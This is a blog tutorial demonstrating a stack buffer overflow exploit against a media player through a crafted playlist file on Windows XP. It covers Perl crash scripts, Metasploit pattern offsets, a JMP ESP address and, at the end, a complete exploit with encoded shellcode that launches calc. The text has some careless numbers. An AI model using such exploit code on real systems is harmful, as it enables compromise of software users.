Schaba's WebLog

Boring days so i just thought write something that will give me some peace.yeahi just wanna show you guys
a quick DEMO of finding a buffer over flow vulnerability and exploit it. err though say its a quick demonstration this take
me some time to write all up.

I recently wrote Bof exploit for caster ripper so i will take it in this demonstration.

Before starting this i wanna tell you guys, to understand what i’m doing in here you gotta have some information about this subject.
and familier with these tools that help me in this process.

I will use thse tools in entire demo

1-Ollydbg (which i find cooler than windbg)

2-Metasploitframework (An awesome tool/framework)

3-Windows Xp installed on vmware

So lets attach the our vulnerable programe to debugger and send our junk data to it and crush it.
Hopefully this small perl script will crush it.
we are sending 5000 x41 which is nothing but 5000 A’s.

my $file= "crush.pls";
my $junk= "\x41" x 5000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

———————————————–
After crushing the CUP registers will look like this.
———————————————–

We can see EIP is overwritten with 41414141 which is AAAAAAA in our buffer.
Great we are now controlling EIP and lets find exact location to place our shell code.

so lets modify our perl script to send another buffer to the programe to crush it.Now we are sending 25000 A’s.

my $file= "crush25000.pls";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

Great now EIP is overwritten with 42424242 which is nothing but BBBBBB. so now we know our buffer size is between 2500 and 3000.

In order to find the exact location, we’ll use Metasploit. I’m going to use windows version of Metasploit
Which is located in C:\program files\metasploit\framwork3

C:\program files\metasploit\framwork3\msf3\tools\pattern_create.rb 5000

It will create unique 5000 patterns.
So lets modify our perl script again.

my $file= "crush25000.pls";
my $junk = "\x41" x 25000;
my $junk2 = "place 5000 characters we created"
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

So now EIP is overwritten with our unique pattern’s 0x42316b42
lets find the offset of it. Here we go offset is 1076
C:\program files\metasploit\framwork3\msf3\tools\pattern_offset.rb 0x42316b42 5000
1076

Jumping to the shellcode.

Executable modules

Because this is a quick demonstration i won’t go much details about this.To find a JMP address you can use findjmp.c (which you can find from internet, just compile it and run it )

Usage of findjmp ( C:\findjmp kernel32.dll esp)

so i’m going to use this address 0x7D113B1F JMP ESP from SHELL32.dll WinXP SP3. You can replace this with some other address.

so lets write up complete exploit. Thats it XD . Don’t worry i skiped lot stuff in this becox it’s just a demo. lol. peace.

#!/usr/bin/perl
my $file= "d3b4g.pls";
my $junk= "A" x 26076;
my $eip = pack('V',0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;     # NOPs
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc
\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "pls File Created successfully\n";